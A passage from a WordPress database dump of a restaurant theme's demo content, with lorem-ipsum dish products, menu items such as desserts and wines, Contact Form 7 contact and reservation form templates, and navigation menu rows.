tincidunt arcu non sodales neque sodales ut etiam sit amet nisl purus in mollis nunc.','publish','open','closed','','antipasto-with-radish','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',0,'http://attika.mikado-themes.com/?post_type=product&amp;p=289',18,'product','',1),(3122,1,'2018-08-03 14:10:09','2018-08-03 14:10:09','Turpis egestas pretium aenean pharetra magna ac placerat. Vestibulum lectus mauris ultrices eros in cursus, turpis massa tincidunt. Dui ut ornare lectus sit amet est placerat in egestas erat imperdiet sed euismod. Nisi porta lorem mollis aliquam ut porttitor leo a diam sollicitudin tempor id eu. Nunc mi ipsum faucibus vitae aliquet nec, ullamcorper sit amet risus.','Butter Fish Cakes','Convallis convallis tellus id interdum velit laoreet id donec ultrices, tincidunt arcu non sodales neque sodales ut etiam sit amet nisl purus in mollis nunc.','publish','open','closed','','butter-fish-cakes','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',0,'http://attika.mikado-themes.com/?post_type=product&amp;p=512',19,'product','',1),(3123,1,'2018-08-03 14:38:58','2018-08-03 14:38:58','Turpis egestas pretium aenean pharetra magna ac placerat. Vestibulum lectus mauris ultrices eros in cursus, turpis massa tincidunt. Dui ut ornare lectus sit amet est placerat in egestas erat imperdiet sed euismod. Nisi porta lorem mollis aliquam ut porttitor leo a diam sollicitudin tempor id eu. Nunc mi ipsum faucibus vitae aliquet nec, ullamcorper sit amet risus.','Vegan Lemon Gremolata','Convallis convallis tellus id interdum velit laoreet id donec ultrices, tincidunt arcu non sodales neque sodales ut etiam sit amet nisl purus in mollis nunc.','publish','open','closed','','vegan-lemon-gremolata','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',0,'http://attika.mikado-themes.com/?post_type=product&amp;p=532',22,'product','',1),(3124,1,'2018-08-03 14:41:08','2018-08-03 14:41:08','Turpis egestas pretium aenean pharetra magna ac placerat. Vestibulum lectus mauris ultrices eros in cursus, turpis massa tincidunt. Dui ut ornare lectus sit amet est placerat in egestas erat imperdiet sed euismod. Nisi porta lorem mollis aliquam ut porttitor leo a diam sollicitudin tempor id eu. Nunc mi ipsum faucibus vitae aliquet nec, ullamcorper sit amet risus.','Stuffed Shrimp Shell','Convallis convallis tellus id interdum velit laoreet id donec ultrices, tincidunt arcu non sodales neque sodales ut etiam sit amet nisl purus in mollis nunc.','publish','open','closed','','stuffed-shrimp-shell','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',0,'http://attika.mikado-themes.com/?post_type=product&amp;p=533',23,'product','',1),(3125,1,'2018-08-03 14:43:38','2018-08-03 14:43:38','Turpis egestas pretium aenean pharetra magna ac placerat. Vestibulum lectus mauris ultrices eros in cursus, turpis massa tincidunt. Dui ut ornare lectus sit amet est placerat in egestas erat imperdiet sed euismod. Nisi porta lorem mollis aliquam ut porttitor leo a diam sollicitudin tempor id eu. Nunc mi ipsum faucibus vitae aliquet nec, ullamcorper sit amet risus.','Cream Fungus Soup','Convallis convallis tellus id interdum velit laoreet id donec ultrices, tincidunt arcu non sodales neque sodales ut etiam sit amet nisl purus in mollis nunc.','publish','open','closed','','cream-fungus-soup','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',0,'http://attika.mikado-themes.com/?post_type=product&amp;p=534',24,'product','',2),(3126,1,'2018-08-03 14:54:07','2018-08-03 14:54:07','Turpis egestas pretium aenean pharetra magna ac placerat. Vestibulum lectus mauris ultrices eros in cursus, turpis massa tincidunt. Dui ut ornare lectus sit amet est placerat in egestas erat imperdiet sed euismod. Nisi porta lorem mollis aliquam ut porttitor leo a diam sollicitudin tempor id eu. Nunc mi ipsum faucibus vitae aliquet nec, ullamcorper sit amet risus.','Marinated Oysters','Convallis convallis tellus id interdum velit laoreet id donec ultrices, tincidunt arcu non sodales neque sodales ut etiam sit amet nisl purus in mollis nunc.','publish','open','closed','','marinated-oysters','','','2018-08-03 14:54:07','2018-08-03 14:54:07','',0,'http://attika.mikado-themes.com/?post_type=product&amp;p=536',25,'product','',0),(3127,1,'2018-08-09 09:02:45','2018-08-09 09:02:45','','Cookie Cheesecake','','publish','closed','closed','','sazerac','','','2018-08-09 09:02:45','2018-08-09 09:02:45','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=827',0,'restaurant-menu','',0),(3128,1,'2018-08-09 09:12:55','2018-08-09 09:12:55','','Margarita Cupcakes','','publish','closed','closed','','sour','','','2018-08-09 09:12:55','2018-08-09 09:12:55','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=829',0,'restaurant-menu','',0),(3129,1,'2018-08-09 09:28:31','2018-08-09 09:28:31','','Butterbeer Pie','','publish','closed','closed','','stirred','','','2018-08-09 09:28:31','2018-08-09 09:28:31','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=830',0,'restaurant-menu','',0),(3130,1,'2018-08-09 14:11:01','2018-08-09 14:11:01','','GinTonic','','publish','closed','closed','','gintonic','','','2018-08-09 14:11:01','2018-08-09 14:11:01','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=911',0,'restaurant-menu','',0),(3131,1,'2018-08-15 07:43:06','2018-08-15 07:43:06','','Fruity Desserts','','publish','closed','closed','','gintonic-2','','','2018-08-15 07:43:06','2018-08-15 07:43:06','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1322',0,'restaurant-menu','',0),(3132,1,'2018-08-15 07:50:08','2018-08-15 07:50:08','','Blueberry Desserts','','publish','closed','closed','','blueberry-desserts','','','2018-08-15 07:50:08','2018-08-15 07:50:08','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1326',0,'restaurant-menu','',0),(3133,1,'2018-08-15 07:51:02','2018-08-15 07:51:02','','Halloween Candy','','publish','closed','closed','','halloween-candy','','','2018-08-15 07:51:02','2018-08-15 07:51:02','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1327',0,'restaurant-menu','',0),(3134,1,'2018-08-15 07:54:15','2018-08-15 07:54:15','','Strawberry Pizza','','publish','closed','closed','','strawberry-pizza','','','2018-08-15 07:54:15','2018-08-15 07:54:15','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1328',0,'restaurant-menu','',0),(3135,1,'2018-08-15 07:57:40','2018-08-15 07:57:40','','Aubry 1er Cru Brut','','publish','closed','closed','','aubry-1er-cru-brut','','','2018-08-15 07:57:40','2018-08-15 07:57:40','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1329',0,'restaurant-menu','',0),(3136,1,'2018-08-15 08:06:26','2018-08-15 08:06:26','','Chateau Marguii Rose 2016','','publish','closed','closed','','chateau-marguii-rose-2016','','','2018-08-15 08:06:26','2018-08-15 08:06:26','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1330',0,'restaurant-menu','',0),(3137,1,'2018-08-15 08:07:37','2018-08-15 08:07:37','','Clos Tue Boeuf \'Petit Blanc\' 2016','','publish','closed','closed','','clos-tue-boeuf-petit-blanc-2016','','','2018-08-15 08:07:37','2018-08-15 08:07:37','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1331',0,'restaurant-menu','',0),(3138,1,'2018-08-15 08:08:30','2018-08-15 08:08:30','','Niepoort \'Redoma Branco\' 2015','','publish','closed','closed','','niepoort-redoma-branco-2015','','','2018-08-15 08:08:30','2018-08-15 08:08:30','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1332',0,'restaurant-menu','',0),(3139,1,'2018-08-15 08:09:04','2018-08-15 08:09:04','','Guillot Broux \'Genievrieres\' 2015','','publish','closed','closed','','guillot-broux-genievrieres-2015','','','2018-08-15 08:09:04','2018-08-15 08:09:04','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1333',0,'restaurant-menu','',0),(3140,1,'2018-08-15 08:13:11','2018-08-15 08:13:11','','Day Wines \'Cancilla Vineyard\' 2014','','publish','closed','closed','','day-wines-cancilla-vineyard-2014','','','2018-08-15 08:13:11','2018-08-15 08:13:11','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1334',0,'restaurant-menu','',0),(3141,1,'2018-08-15 08:14:03','2018-08-15 08:14:03','','Chateau Marguii Rose 2014','','publish','closed','closed','','chateau-marguii-rose-2014','','','2018-08-15 08:14:03','2018-08-15 08:14:03','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1335',0,'restaurant-menu','',0),(3142,1,'2018-08-15 08:14:34','2018-08-15 08:14:34','','Clos Tue Boeuf \'Petit Blanc\' 2013','','publish','closed','closed','','clos-tue-boeuf-petit-blanc-2013','','','2018-08-15 08:14:34','2018-08-15 08:14:34','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1336',0,'restaurant-menu','',0),(3143,1,'2018-08-15 08:15:12','2018-08-15 08:15:12','','Niepoort \'Redoma Branco\' 2012','','publish','closed','closed','','niepoort-redoma-branco-2012','','','2018-08-15 08:15:12','2018-08-15 08:15:12','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1337',0,'restaurant-menu','',0),(3144,1,'2018-08-15 08:30:48','2018-08-15 08:30:48','','Peachy Jalapeno Guacamole','','publish','closed','closed','','peachy-jalapeno-guacamole','','','2018-08-15 08:30:48','2018-08-15 08:30:48','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1338',0,'restaurant-menu','',0),(3145,1,'2018-08-15 08:37:56','2018-08-15 08:37:56','','Tomato-Goat Cheese Spread','','publish','closed','closed','','tomato-goat-cheese-spread','','','2018-08-15 08:37:56','2018-08-15 08:37:56','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1339',0,'restaurant-menu','',0),(3146,1,'2018-08-15 08:46:58','2018-08-15 08:46:58','','Garlic Garbanzo Bean Spread','','publish','closed','closed','','garlic-garbanzo-bean-spread','','','2018-08-15 08:46:58','2018-08-15 08:46:58','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1340',0,'restaurant-menu','',0),(3147,1,'2018-08-15 08:50:09','2018-08-15 08:50:09','','Artichoke Caprese Platter','','publish','closed','closed','','artichoke-caprese-platter','','','2018-08-15 08:50:09','2018-08-15 08:50:09','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1341',0,'restaurant-menu','',0),(3148,1,'2018-08-15 08:53:27','2018-08-15 08:53:27','','Pastrami Roll','','publish','closed','closed','','pastrami-roll','','','2018-08-15 08:53:27','2018-08-15 08:53:27','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1342',0,'restaurant-menu','',0),(3149,1,'2018-08-15 08:55:05','2018-08-15 08:55:05','','Ham & Potato Sandwiches','','publish','closed','closed','','ham-potato-sandwiches','','','2018-08-15 08:55:05','2018-08-15 08:55:05','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1343',0,'restaurant-menu','',0),(3150,1,'2018-08-15 08:57:07','2018-08-15 08:57:07','','Brownie Batter Dip','','publish','closed','closed','','brownie-batter-dip','','','2018-08-15 08:57:07','2018-08-15 08:57:07','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1344',0,'restaurant-menu','',0),(3151,1,'2018-08-15 08:57:45','2018-08-15 08:57:45','','Caprese Salad Kabobs','','publish','closed','closed','','caprese-salad-kabobs','','','2018-08-15 08:57:45','2018-08-15 08:57:45','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1345',0,'restaurant-menu','',0),(3152,1,'2018-08-01 13:32:33','2018-08-01 13:32:33','','1','','publish','closed','closed','','1','','','2018-08-01 13:32:33','2018-08-01 13:32:33','',0,'http://attika.mikado-themes.com/?post_type=testimonials&amp;p=308',0,'testimonials','',0),(3153,1,'2018-08-07 08:28:28','2018-08-07 08:28:28','','2','','publish','closed','closed','','2','','','2018-08-07 08:28:28','2018-08-07 08:28:28','',0,'http://attika.mikado-themes.com/?post_type=testimonials&amp;p=602',0,'testimonials','',0),(3154,1,'2018-07-25 08:28:29','2018-07-25 08:28:29','<label> Your Name (required)\n    [text* your-name] </label>\n\n<label> Your Email (required)\n    [email* your-email] </label>\n\n<label> Subject\n    [text your-subject] </label>\n\n<label> Your Message\n    [textarea your-message] </label>\n\n[submit \"Send\"]\nAttika \"[your-subject]\"\n[your-name] <wordpress@attika.mikado-themes.com>\nFrom: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Attika (http://attika.mikado-themes.com)\nsupport@mikado-themes.com\nReply-To: [your-email]\n\n0\n0\n\nAttika \"[your-subject]\"\nAttika <wordpress@attika.mikado-themes.com>\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Attika (http://attika.mikado-themes.com)\n[your-email]\nReply-To: support@mikado-themes.com\n\n0\n0\nThank you for your message. It has been sent.\nThere was an error trying to send your message. Please try again later.\nOne or more fields have an error. Please check and try again.\nThere was an error trying to send your message. Please try again later.\nYou must accept the terms and conditions before sending your message.\nThe field is required.\nThe field is too long.\nThe field is too short.','Contact form 1','','publish','closed','closed','','contact-form-1','','','2018-07-25 08:28:29','2018-07-25 08:28:29','',0,'http://attika.mikado-themes.com/?post_type=wpcf7_contact_form&amp;p=5',0,'wpcf7_contact_form','',0),(3155,1,'2018-08-09 09:25:48','2018-08-09 09:25:48','<div class=\"mkdf-cf7-rf\">\n<label> Event name:[text* event-name]</label><div class=\"mkdf-cf7-rf-date\">\n<label> Event date:[date* your-date min:2018-08-01 max:2050-12-31 class:required \"2018-08-01\"]</label><label> Start time:[time* time-938 time-format:HH:mm min-hour:00-00 max-hour:24*00 step-hour:1]</label><label> End time:[time* time-624 time-format:HH:mm] </label>\n</div>\n[checkbox checkbox-201 \"I/We have flexible date\"]\n<div class=\"mkdf-cf7-rf-guests\">\n<label> Guests:[text* guests] </label><label> Budget:[text* budget]</label><p>[radio radio-653 class:guests label_first default:1 \"Total\" \"Per person\" ]</p>\n</div>\n<label> Contact name:[text* contact-name] </label>\n<div class=\"mkdf-cf7-rf-2-col\">\n<label> Company (optional):[text company-name] </label><label>Industry (optional):[text industry-name]</label>\n</div>\n<div class=\"mkdf-cf7-rf-2-col\">\n<label> Email:[email* your-email] </label><label>Phone:[text* phone-number]</label>\n</div>\n<div class=\"mkdf-cf7-rf-msg\">\n<label> Tell us more about event (optional):\n[textarea your-message] </label>\n</div>\n<div class=\"mkdf-cf7-rf-btn\">\n<div class=\"mkdf-cf7-rf-btn-inner\">\n[submit \"Send Reservation\"]\n</div>\n</div>\n</div>\n1\nAttika \"[your-subject]\"\n[your-name] <wordpress@attika.mikado-themes.com>\nsupport@mikado-themes.com\nFrom: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Attika (http://attika.mikado-themes.com)\nReply-To: [your-email]\n\n\n\n\nAttika \"[your-subject]\"\nAttika <wordpress@attika.mikado-themes.com>\n[your-email]\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Attika (http://attika.mikado-themes.com)\nReply-To: support@mikado-themes.com\n\n\n\nThank you for your message. It has been sent.\nThere was an error trying to send your message. Please try again later.\nOne or more fields have an error. Please check and try again.\nThere was an error trying to send your message. Please try again later.\nYou must accept the terms and conditions before sending your message.\nThe field is required.\nThe field is too long.\nThe field is too short.\nThere was an unknown error uploading the file.\nYou are not allowed to upload files of this type.\nThe file is too big.\nThere was an error uploading the file.\nThe number format is invalid.\nThe number is smaller than the minimum allowed.\nThe number is larger than the maximum allowed.\nThe answer to the quiz is incorrect.\nYour entered code is incorrect.\nThe e-mail address entered is invalid.\nThe URL is invalid.\nThe telephone number is invalid.\nInvalid date and time supplied.\nThe date format is incorrect.\nInvalid time supplied.','Reservation form','','publish','closed','closed','','reservation-form','','','2018-08-09 09:25:48','2018-08-09 09:25:48','',0,'http://attika.mikado-themes.com/?post_type=wpcf7_contact_form&amp;p=831',0,'wpcf7_contact_form','',0),(3156,1,'2020-12-05 17:06:22','2020-12-05 16:06:22',' ','','','publish','closed','closed','','3156','','','2020-12-05 17:06:22','2020-12-05 16:06:22','',0,'https://www.ristorantesolymar.it/2020/12/05/3156/',2,'nav_menu_item','',0),(3157,1,'2020-12-05 17:06:22','2020-12-05 16:06:22',' ','','','publish','closed','closed','','3157','','','2020-12-05 17:06:22','2020-12-05 16:06:22','',0,'https://www.ristorantesolymar.it/2020/12/05/3157/',34,'nav_menu_item','',0),(3158,1,'2020-12-05 17:06:22','2020-12-05 16:06:22',' ','','','publish','closed','closed','','3158','','','2020-12-05 17:06:22','2020-12-05 16:06:22','',0,'https://www.ristorantesolymar.it/2020/12/05/3158/',42,'nav_menu_item','',0),(3159,1,'2020-12-05 17:06:22','2020-12-05 16:06:22',' ','','','publish','closed','closed','','3159','','','2020-12-05 17:06:22','2020-12-05 16:06:22','',0,'https://www.ristorantesolymar.it/2020/12/05/3159/',43,'nav_menu_item','',0),(3160,1,'2020-12-05 17:06:22','2020-12-05 16:06:22',' ','','','publish','closed','closed','','3160','','','2020-12-05 17:06:22','2020-12-05 16:06:22','',0,'https://www.ristorantesolymar.it/2020/12/05/3160/',41,'nav_menu_item','',0),(3161,1,'2020-12-05 17:06:22','2020-12-05 16:06:22',' ','','','publish','closed','closed','','3161','','','2020-12-05 17:06:22','2020-12-05 16:06:22','',0,'https://www.ristorantesolymar.it/2020/12/05/3161/',96,'nav_menu_item','',0),(3162,1,'2020-12-05 17:06:22','2020-12-05 16:06:22',' ','','','publish','closed','closed','','3162','','','2020-12-05 17:06:22','2020-12-05 16:06:22','',0,'https://www.ristorantesolymar.it/2020/12/05/3162/',52,'nav_menu_item','',0),(3163,1,'2020-12-05 17:06:22','2020-12-05 16:06:22',' ','','','publish','closed','closed','','3163','','','2020-12-05 17:06:22','2020-12-05 16:06:22','',0,'https://www.ristorantesolymar.it/2020/12/05/3163/',2,'nav_menu_item','',0),(3164,1,'2020-12-05 17:06:22','2020-12-05 16:06:22',' ','','','publish','closed','closed','','3164','','','2020-12-05 17:06:22','2020-12-05 16:06:22','',0,'https://www.ristorantesolymar.it/2020/12/05/3164/',11,'nav_menu_item','',0),(3165,1,'2020-12-05 17:06:22','2020-12-05 16:06:22',' ','','','publish','closed','closed','','3165','','','2020-12-05 17:06:22','2020-12-05 16:06:22','',0,'https://www.ristorantesolymar.it/2020/12/05/3165/',9,'nav_menu_item','',0),(3166,1,'2020-12-05 17:06:22','2020-12-05 16:06:22',' ','','','publish','closed','closed','','3166','','','2020-12-05 17:06:22','2020-12-05 16:06:22','',0,'https://www.ristorantesolymar.it/2020/12/05/3166/',10,'nav_menu_item','',0),(3167,1,'2020-12-05 17:06:22','2020-12-05 16:06:22',' ','','','publish','closed','closed','','3167','','','2020-12-05 17:06:22','2020-12-05 16:06:22','',0,'https://www.ristorantesolymar.it/2020/12/05/3167/',20,'nav_menu_item','',0),(3168,1,'2020-12-05 17:06:22','2020-12-05 16:06:22',' ','','','publish','closed','closed','','3168','','','2020-12-05 17:06:22','2020-12-05 16:06:22','',0,'https://www.ristorantesolymar.it/2020/12/05/3168/',16,'nav_menu_item','',0),(3169,1,'2020-12-05 17:06:22','2020-12-05 16:06:22',' ','','','publish','closed','closed','','3169','','','2020-12-05 17:06:22','2020-12-05 16:06:22','',0,'https://www.ristorantesolymar.it/2020/12/05/3169/',4,'nav_menu_item','',0),(3170,1,'2020-12-05 17:06:22','2020-12-05 16:06:22',' ','','','publish','closed','closed','','3170','','','2020-12-05 17:06:22','2020-12-05 16:06:22','',0,'https://www.ristorantesolymar.it/2020/12/05/3170/',3,'nav_menu_item','',0),(3171,1,'2020-12-05 17:06:22','2020-12-05 16:06:22',' ','','','publish','closed','closed','','3171','','','2020-12-05 17:06:22','2020-12-05 16:06:22','',0,'https://www.ristorantesolymar.it/2020/12/05/3171/',4,'nav_menu_item','',0),(3172,1,'2020-12-05 17:06:22','2020-12-05 16:06:22',' ','','','publish','closed','closed','','3172','','','2020-12-05 17:06:22','2020-12-05 16:06:22','',0,'https://www.ristorantesolymar.it/2020/12/05/3172/',3,'nav_menu_item','',0),(3173,1,'2020-12-05 17:06:22','2020-12-05 16:06:22',' ','','','publish','closed','closed','','3173','','','2020-12-05 17:06:22','2020-12-05 16:06:22','',0,'https://www.ristorantesolymar.it/2020/12/05/3173/',12,'nav_menu_item','',0),(3174,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3174','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',0,'https://www.ristorantesolymar.it/2020/12/05/3174/',19,'nav_menu_item','',0),(3175,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3175','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',0,'https://www.ristorantesolymar.it/2020/12/05/3175/',44,'nav_menu_item','',0),(3176,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3176','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',0,'https://www.ristorantesolymar.it/2020/12/05/3176/',13,'nav_menu_item','',0),(3177,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3177','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',0,'https://www.ristorantesolymar.it/2020/12/05/3177/',13,'nav_menu_item','',0),(3178,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3178','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',3034,'https://www.ristorantesolymar.it/2020/12/05/3178/',7,'nav_menu_item','',0),(3179,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3179','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',3034,'https://www.ristorantesolymar.it/2020/12/05/3179/',6,'nav_menu_item','',0),(3180,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3180','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',3034,'https://www.ristorantesolymar.it/2020/12/05/3180/',5,'nav_menu_item','',0),(3181,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3181','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',3034,'https://www.ristorantesolymar.it/2020/12/05/3181/',18,'nav_menu_item','',0),(3182,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3182','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',3034,'https://www.ristorantesolymar.it/2020/12/05/3182/',39,'nav_menu_item','',0),(3183,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3183','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',3034,'https://www.ristorantesolymar.it/2020/12/05/3183/',38,'nav_menu_item','',0),(3184,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3184','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',3034,'https://www.ristorantesolymar.it/2020/12/05/3184/',37,'nav_menu_item','',0),(3185,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3185','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',0,'https://www.ristorantesolymar.it/2020/12/05/3185/',14,'nav_menu_item','',0),(3186,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3186','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',0,'https://www.ristorantesolymar.it/2020/12/05/3186/',21,'nav_menu_item','',0),(3187,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3187','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',0,'https://www.ristorantesolymar.it/2020/12/05/3187/',15,'nav_menu_item','',0),(3188,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3188','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',0,'https://www.ristorantesolymar.it/2020/12/05/3188/',16,'nav_menu_item','',0),(3189,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3189','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',0,'https://www.ristorantesolymar.it/2020/12/05/3189/',2,'nav_menu_item','',0),(3190,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3190','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',0,'https://www.ristorantesolymar.it/2020/12/05/3190/',3,'nav_menu_item','',0),(3191,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3191','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',0,'https://www.ristorantesolymar.it/2020/12/05/3191/',2,'nav_menu_item','',0),(3192,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3192','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',0,'https://www.ristorantesolymar.it/2020/12/05/3192/',2,'nav_menu_item','',0),(3193,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3193','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',0,'https://www.ristorantesolymar.it/2020/12/05/3193/',18,'nav_menu_item','',0),(3194,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3194','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',0,'https://www.ristorantesolymar.it/2020/12/05/3194/',9,'nav_menu_item','',0),(3195,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3195','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',0,'https://www.ristorantesolymar.it/2020/12/05/3195/',9,'nav_menu_item','',0),(3196,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3196','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',0,'https://www.ristorantesolymar.it/2020/12/05/3196/',5,'nav_menu_item','',0),(3197,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3197','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',0,'https://www.ristorantesolymar.it/2020/12/05/3197/',7,'nav_menu_item','',0),(3198,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3198','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',0,'https://www.ristorantesolymar.it/2020/12/05/3198/',7,'nav_menu_item','',0),(3199,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3199','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',0,'https://www.ristorantesolymar.it/2020/12/05/3199/',5,'nav_menu_item','',0),(3200,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3200','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',0,'https://www.ristorantesolymar.it/2020/12/05/3200/',5,'nav_menu_item','',0),(3201,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3201','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',0,'https://www.ristorantesolymar.it/2020/12/05/3201/',12,'nav_menu_item','',0),(3202,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3202','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',0,'https://www.ristorantesolymar.it/2020/12/05/3202/',19,'nav_menu_item','',0),(3203,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3203','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',0,'https://www.ristorantesolymar.it/2020/12/05/3203/',17,'nav_menu_item','',0),(3204,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3204','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',0,'https://www.ristorantesolymar.it/2020/12/05/3204/',20,'nav_menu_item','',0),(3205,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3205','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',0,'https://www.ristorantesolymar.it/2020/12/05/3205/',8,'nav_menu_item','',0),(3206,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3206','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',0,'https://www.ristorantesolymar.it/2020/12/05/3206/',8,'nav_menu_item','',0),(3207,1,'2020-12-05 17:06:23','2020-12-05 16:06:23',' ','','','publish','closed','closed','','3207','','','2020-12-05 17:06:23','2020-12-05 16:06:23','',0,'https://www.ristorantesolymar.it/2020/12/05/3207/',4,'nav_menu_item','',0),(3208,1,'2020-12-05 17:06:24','2020-12-05 16:06:24','','Four Columns Wide','','publish','closed','closed','','four-columns-wide','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',3061,'https://www.ristorantesolymar.it/2020/12/05/four-columns-wide/',57,'nav_menu_item','',0),(3209,1,'2020-12-05 17:06:24','2020-12-05 16:06:24','','Four Columns','','publish','closed','closed','','four-columns','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',3061,'https://www.ristorantesolymar.it/2020/12/05/four-columns/',56,'nav_menu_item','',0),(3210,1,'2020-12-05 17:06:24','2020-12-05 16:06:24','','Three Columns','','publish','closed','closed','','three-columns','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',3061,'https://www.ristorantesolymar.it/2020/12/05/three-columns/',55,'nav_menu_item','',0),(3211,1,'2020-12-05 17:06:24','2020-12-05 16:06:24','','Big Slider','','publish','closed','closed','','big-slider','','','2020-12-05 17:06:24','2020-12-05 